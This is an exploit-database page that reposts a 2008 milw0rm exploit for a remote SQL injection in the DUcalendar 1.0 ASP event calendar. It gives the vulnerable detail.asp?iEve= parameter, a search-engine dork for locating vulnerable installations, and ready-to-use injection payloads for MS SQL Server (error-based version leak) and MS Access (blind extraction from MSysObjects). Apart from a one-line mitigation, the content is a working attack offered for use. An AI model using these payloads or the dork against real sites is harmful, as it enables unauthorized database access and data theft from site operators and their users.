header-logo
Suggest Exploit
vendor:
DUcalendar
by:
milw0rm.com
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: DUcalendar
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codedworld:ducalendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit

DUcalendar is a free event calendar written in ASP. It has a vulnerability that allows for remote SQL injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the detail.asp page with the iEve parameter. For MS SQL Server, the query is convert(int,(select+@@version))-- and for MS Access, the query is IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00.

Mitigation:

Developers should ensure that user input is properly sanitized and validated to prevent SQL injection attacks.
Source

Exploit-DB raw data:

                                            DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit


[+] Script : DUcalendar 

[+] Version : 1.0 (Maybe others) 

[+] Exploit : Remote SQL Injection 

[+] Script URL : http://www.codedworld.com/download/ducalendar-/545.html 

[+] Description : ('Free Event Calendar written in ASP. Features include 
unlimited entries, organized in category. Events displayed with full 
description, date, location. Users can submit new events and search for 
events. Complete Web-based Admin. Dreamweaver friendly.') 

[+] Dork : intitle:"DUcalendar 1.0" 

--//--> Exploit : 

http://d0rk.co.il/calendar/detail.asp?iEve={SQL} 

--__--> For Ms SQL Server : convert(int,(select+@@version))-- 

--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00 


--//--> Greetz : allah , Underz0ne Crew , and all my friends .. 

# milw0rm.com [2008-06-24]

Navigation

Suggest Exploit

Services By CQR